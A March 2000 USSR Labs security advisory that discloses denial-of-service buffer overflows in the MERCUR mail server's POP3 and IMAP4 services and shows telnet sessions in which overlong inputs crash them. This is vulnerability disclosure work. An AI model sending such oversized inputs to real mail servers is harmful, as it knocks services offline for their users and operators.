Local / Remote Multiples Remote DoS Attacks in MERCUR v3.2* for Windows 98/NT Vulnerability

[labs () USSRBACK COM (Ussr Labs)]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Local / Remote Multiples Remote DoS Attacks in MERCUR v3.2* for
Windows 98/NT Vulnerability

USSR Advisory Code:   USSR-2000035

Release Date:
March 15, 2000

Systems Affected:
MERCUR Mailserver 3.2
MERCUR POP3-Server (v3.20.01) for  Windows 98/NT
MERCUR IMAP4-Server (v3.20.01) for Windows 98/NT

THE PROBLEM

UssrLabs found multiple places in MERCUR v3.20.* where they do not
use proper bounds checking.
The following all result in a Denial of Service against the service
in question.

Example:
[hellme () die-communitech net$ telnet example.com 110
Trying example.com...
Connected to example.com.
Escape character is '^]'.
+OK MERCUR POP3-Server (v3.20.01 Unregistered) for Windows NT ready
at Tue, 14 M
ar 2000  03:30:39 -0300
user (buffer)

Where [buffer] is  aprox. 2000 characters.

[hellme () die-communitech net$ telnet example.com 143
Trying example.com...
Connected to example.com.
Escape character is '^]'.
* OK MERCUR IMAP4-Server (v3.20.01 Unregistered) for Windows NT ready
at Tue, 14
 Mar 2000  03:34:09 -0300
(buffer)

Where [buffer] is aprox. 3000 characters.

Binary or source for this Exploit:

http://www.ussrback.com/

Exploit:
the Exploit, crash the remote machine service pop3 and imap

Vendor Status:
informed

Vendor   Url: http://www.atrium-software.com
Program Url: http://www.atrium-software.com/mercur/mercur_e.html

Credit: USSRLABS

SOLUTION
Noting yet.

Greetings:
Eeye, Attrition, w00w00, beavuh, Rhino9, ADM, HNN, Technotronic and
Wiretrip.

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.5.2 for non-commercial use <http://www.pgp.com>

iQA/AwUBOM3mWKVRYEYcg938EQIXsQCgmHUTL47TZHT77Z2jBi6G4kEQx/8AoPV3
p8SaqmGK9Dls6ujMJucLz4vq
=CUnk
-----END PGP SIGNATURE-----